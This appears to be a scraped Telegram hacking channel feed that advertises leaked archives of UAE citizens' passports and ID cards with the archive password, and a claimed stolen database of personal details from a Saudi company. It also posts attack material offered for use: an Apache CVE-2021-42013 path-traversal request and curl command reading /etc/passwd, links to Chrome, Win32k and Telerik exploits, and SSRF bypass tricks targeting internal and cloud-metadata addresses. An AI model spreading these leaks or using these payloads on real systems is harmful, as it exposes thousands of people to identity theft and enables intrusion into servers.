Documents of the people of the United Arab Emirates.
850 files, including national card, identity card, passport, resume and other documents.
size : 1GB
Long Live Iran
اسناد مردم امارات متحده عربی.
850 پرونده شامل کارت ملی ، شناسنامه ، پاسپورت ، رزومه و سایر اسناد.
حجم : 1GB
زنده باد ایران
DOWNLOAD 👇👇👇
850 files, including national card, identity card, passport, resume and other documents.
size : 1GB
Long Live Iran
اسناد مردم امارات متحده عربی.
850 پرونده شامل کارت ملی ، شناسنامه ، پاسپورت ، رزومه و سایر اسناد.
حجم : 1GB
زنده باد ایران
DOWNLOAD 👇👇👇
UAE-passport-hacked-h4shur-1.rar
493.6 MB
United Arab Emirates - passport - part 1
password : h4shur
password : h4shur
UAE-passport-hacked-h4shur-2.rar
494.6 MB
United Arab Emirates - passport - part 2
password : h4shur
password : h4shur
restnight.com.sa.rar
199 KB
Saudi company Rest night was hacked.
Complete company database and information of more than 4,000 people.
Information includes:
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiration
شرکت رست نایت عربستان سعودی هک شد.
دیتابیس کامل شرکت و اطلاعات بیش از ۴۰۰۰ نفر.
اطلاعات شامل :
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiratio
by #h4shur
Password: h4shur
Complete company database and information of more than 4,000 people.
Information includes:
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiration
شرکت رست نایت عربستان سعودی هک شد.
دیتابیس کامل شرکت و اطلاعات بیش از ۴۰۰۰ نفر.
اطلاعات شامل :
Fax ,Job ,City ,Email ,Fname ,Lname ,Mname ,Phone ,Mobile ,Zipcode ,Date ,Reg type ,Id type ,Creation date ,Id expiratio
by #h4shur
Password: h4shur
This media is not supported in your browser
VIEW IN TELEGRAM
apache HTTP server cgi-bin Path traversal and RCE 😍
cve : (CVE-2021-42013)
GET /cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd HTTP/1.1
This exploit can bypass for Apache HTTP Server 2.4.50 (CVE-2021-41773 Patch Version)🙂
curl http://(domain)/cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd
cve : (CVE-2021-42013)
GET /cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd HTTP/1.1
This exploit can bypass for Apache HTTP Server 2.4.50 (CVE-2021-41773 Patch Version)🙂
curl http://(domain)/cgi-bin/%%32%65%%32%65/.../%%32%65%%32%65/etc/passwd
🕷CVE-2021-30573:Google Chrome 91 Use After Free vulnerability
Version : [91.0.4472.77]
GITHUB : https://github.com/oxctdev/CVE-2021-30573
[HIGH] CVE-2021-30573 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30573
Version : [91.0.4472.77]
GITHUB : https://github.com/oxctdev/CVE-2021-30573
[HIGH] CVE-2021-30573 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30573
⭕️ Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)
https://github.com/ly4k/CallbackHell
#LPE #windows #cve
https://github.com/ly4k/CallbackHell
#LPE #windows #cve
GitHub
GitHub - ly4k/CallbackHell: Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE) - ly4k/CallbackHell
43874.py
11.6 KB
exploit for telerik.web.ui
old
cve : CVE-2017-11317
قدیمی اما کاربردی
old
cve : CVE-2017-11317
قدیمی اما کاربردی
This media is not supported in your browser
VIEW IN TELEGRAM
♣Google Chrome NTP XSS via Google Search CSRF
- Link : https://www.suse.com/security/cve/CVE-2021-37999.html
CVE : CVE-2021-37999
- Link : https://bugs.chromium.org/p/chromium/issues/detail?id=1251541
- Link : https://www.suse.com/security/cve/CVE-2021-37999.html
CVE : CVE-2021-37999
- Link : https://bugs.chromium.org/p/chromium/issues/detail?id=1251541
کتاب آموزش کامل ترموکس.PDF
6.2 MB
کتاب آموزش کامل ترموکس و دستورات لینوکسی با تصویر و مثال
Windows 10 RCE
The exploit is in the link
Link : https://positive.security/blog/ms-officecmd-rce
#RCE
The exploit is in the link
Link : https://positive.security/blog/ms-officecmd-rce
#RCE
positive.security
Windows 10 RCE: The exploit is in the link | Positive Security
Chaining a misconfiguration in IE11/Edge Legacy with an argument injection in a Windows 10/11 default URI handler and a bypass for a previous Electron patch, we developed a drive-by RCE exploit for Windows 10. The main vulnerability in the ms-officecmd URI…
Bypass using octal IP
Implementations differ on how to handle octal format of ipv4.
http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
Implementations differ on how to handle octal format of ipv4.
http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
Bypass using a decimal IP location
http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254
http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254